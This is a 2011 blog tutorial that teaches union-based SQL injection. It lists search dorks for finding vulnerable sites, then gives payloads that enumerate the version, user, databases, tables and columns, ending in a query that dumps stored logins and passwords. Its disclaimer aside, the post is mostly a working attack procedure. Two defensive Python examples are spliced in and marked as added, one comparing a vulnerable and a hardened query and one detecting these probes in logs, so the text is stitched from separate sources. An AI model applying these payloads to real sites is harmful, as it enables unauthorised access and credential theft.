Monday, May 30, 2011

How to SQLI

This is for educational purposes only. I am not responsible for your actions based on the content provided.

Hey everyone! I'm Epic, and today I will be teaching you how to SQLI. I will do this in a question-and-answer format: I will start with a broad question at the beginning of every step and clarify the answer beneath it. I think this is the simplest, easiest way to teach you. I would like to state a few things: I have only attempted SQLI on websites I own and created; I do not recommend or encourage you to use this to "hack" websites that are not your own property and creation. This thread is meant for research and education purposes, not to supply or support hackers. I do not condone or support illegal hacking. I am not responsible for consequences should you partake in illegal hacking. I am not responsible for anyone who interprets this thread incorrectly and uses it for illegal hacking.

Now that we've gotten that out of the way, let's begin!

SOME THINGS TO REMEMBER WHILE READING THIS GUIDE
This is not the easiest method; there is an easier, less-involved method beneath, though some find this "completely on your own" method more satisfying. Anything within CODE tags represents the doing part of a step, the part where you will actually do/enter something (you may have to press Enter/Return to reload your browser). The text and pictures help to keep you on track and explain what's going on.

What is SQLI?
SQLI stands for SQL Injection. What's SQL? It stands for Structured Query Language, a database computer language designed for managing data in relational database management systems (RDBMS). SQL Injection is when you "inject" (hack) into a website: you can steal data, or you can upload your own data (some might call this defacing a website).

Okay, how do I start?
Well, you start by finding a "vuln host", as many tutorials describe it. Basically, you need to find a vulnerable website that will allow you to SQLI. Not all websites are vulnerable to SQLI; while all websites are at risk of some form of hacking, a site may be too secure and well coded to SQLI.

First off, you'll need "dorks". Here are a few dorks that you can use (although there are many more):
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
Here is a list of more dorks.

You saying I'm a dork? - Now what?

Let's say you're on this website:
Code:
http://site.com/news/view.php?id=828
Add a single quotation mark (') before or after the number and it should show an error, assuming it's vulnerable to SQLI:


How do I find the right number of columns?
You need to find the right amount of columns by using the "order by" command:
Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
If this is the case, and the error is on the ninth, it means the page has 8 columns. This is typical but should not be expected; you will find that different websites have different numbers of columns.

Now we will use the "Union Select" command:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
Don't forget the two dashes (--) after the numbers. The numbers (1 through 8 in this scenario) reflect the number of columns the website has, so if your website only had two columns you'd enter 1,2.

This will make the website show some numbers on the screen:


If so, the website is definitely SQLI vulnerable, and ready to hack.
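The behaviour the quote and "order by" probes depend on, and the fix for it, as an added example that is not from the original post: a vulnerable lookup that pastes the id into the SQL text beside a hardened one that validates the type and binds it as a parameter. It assumes an in-memory SQLite table standing in for the MySQL news table; the table layout and its one row are constructed.

```python
import sqlite3

# Constructed stand-in for the page's news table: eight columns, one row with
# id 828 (SQLite in memory; the page's target is MySQL, but the flaw is the same).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT,"
            " c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT)")
_db.execute("INSERT INTO news VALUES (828, 'Hello', 'Body', 'epic', '', '', '', '')")


def vulnerable_lookup(id_param):
    """What the page's view.php effectively does: the raw id is pasted into
    the SQL text, so quotes, ORDER BY and UNION SELECT become part of it."""
    return _db.execute(f"SELECT * FROM news WHERE id = {id_param}").fetchall()


def hardened_lookup(id_param):
    """Fix: reject anything that is not an integer, then bind the value as a
    parameter so it travels separately from the statement text."""
    try:
        news_id = int(id_param)          # "828 order by 9--" is not an integer
    except ValueError:
        raise ValueError("id must be an integer") from None
    return _db.execute("SELECT * FROM news WHERE id = ?", (news_id,)).fetchall()


def outcome(lookup, id_param):
    """Summarise a request: rows returned, a database error (the page's
    quote / ORDER BY tell), or input rejected before any query ran."""
    try:
        rows = lookup(id_param)
    except ValueError:
        return "rejected"
    except sqlite3.Error:
        return "db-error"
    return f"{len(rows)} row(s), first={rows[0][0] if rows else None}"


if __name__ == "__main__":
    for probe in ["828", "828'", "828 order by 9--",
                  "-828 union select 1,2,3,4,5,6,7,8--"]:
        print(f"{probe!r:45} vulnerable: {outcome(vulnerable_lookup, probe):22}"
              f" hardened: {outcome(hardened_lookup, probe)}")
```

The error on the quote and on "order by 9" is the database complaining about the altered statement; the hardened version never lets the statement change, so the probes are rejected before any query runs.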

How do I get the MySQL version and current user?

Now we need to know the MySQL version; if it's over 5 (hopefully it is) we'll be able to hack it, because MySQL 5 introduced the information_schema database that the later steps query. If it's under 5 I STRONGLY urge you to find a different website; it will be difficult for beginners because when it's under 5 you'll have to randomly guess the tables and columns.

Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
You should now be at this point:


To get the current user, enter this:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
This will change the website display to:


How do I get the Databases?

Now we want to find the databases and the current database.
Here is the syntax for all databases:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
Your display should now appear as:



Now we would like to know what the current database is; it's pretty obvious in this case but useful sometimes.

Syntax for current database:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
If you're following along correctly, you should now get:




How do I get the tables?

Now we want to know the tables in the database and for this we will continue using "union select".

Here is the code:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
Hopefully you have reached this point:


We now know, from the data we have received, that the table passwords should be stored in is called "users" or something that looks like that; write it down and move on.

How do I get columns?

Now we want to know the columns.

Here is the code:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
We're now at this point:


How do I finally get the account info? How do I dump user/pass?

Now you want to dump logins and passwords from bpusers:

Here is the code for that:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--


(NOTE: 0x3a is the hex code for ':' and will put a : between logins and passwords.)


Congratulations, you should have successfully completed an SQLI attack.
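From the defender's side, an added example (not part of the original post) that scans web-server access logs for the probes this guide walks through and flags a client whose probes caused server errors and then got a 200 on a UNION SELECT. The log lines, addresses and signature regexes are constructed for this example, not taken from any product.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the probes this guide uses, applied to the URL-decoded query
# string (assumed regexes written for this example, not a product's rules).
SIGNATURES = {
    "stray-quote": re.compile(r"'"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.", re.I),
    "fingerprint": re.compile(r"@@version|\buser\(\)|\bdatabase\(\)", re.I),
    "comment-terminator": re.compile(r"--\s*$|#\s*$"),
}

# Common Log Format: ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log (RFC 5737 addresses): a normal hit, the quote and
# ORDER BY probes producing 500s, then a successful UNION SELECT.
SAMPLE_LOG = """\
203.0.113.5 - - [30/May/2011:10:00:01 +0000] "GET /news/view.php?id=828 HTTP/1.1" 200 5120
203.0.113.5 - - [30/May/2011:10:00:09 +0000] "GET /news/view.php?id=828%27 HTTP/1.1" 500 312
203.0.113.5 - - [30/May/2011:10:00:30 +0000] "GET /news/view.php?id=828%20order%20by%209-- HTTP/1.1" 500 312
203.0.113.5 - - [30/May/2011:10:01:02 +0000] "GET /news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8+from+information_schema.schemata-- HTTP/1.1" 200 4881
198.51.100.7 - - [30/May/2011:10:01:10 +0000] "GET /news/view.php?id=827 HTTP/1.1" 200 5002
"""


def scan(log_text):
    """One finding per request whose decoded query string matches a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = unquote_plus(urlsplit(m["url"]).query)   # %20 and + become spaces
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hits:
            findings.append({"ip": m["ip"], "status": int(m["status"]), "hits": hits})
    return findings


def escalated_ips(findings):
    """Clients whose probes caused server errors and later got a 200 on a
    UNION SELECT: the error-then-extract sequence this guide walks through."""
    errored = {f["ip"] for f in findings if f["status"] >= 500}
    extracted = {f["ip"] for f in findings
                 if f["status"] == 200 and "union-select" in f["hits"]}
    return errored & extracted
```

The 500s alone are the cheapest early warning: an integer id that produces a database error means the input reached the query unchecked.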



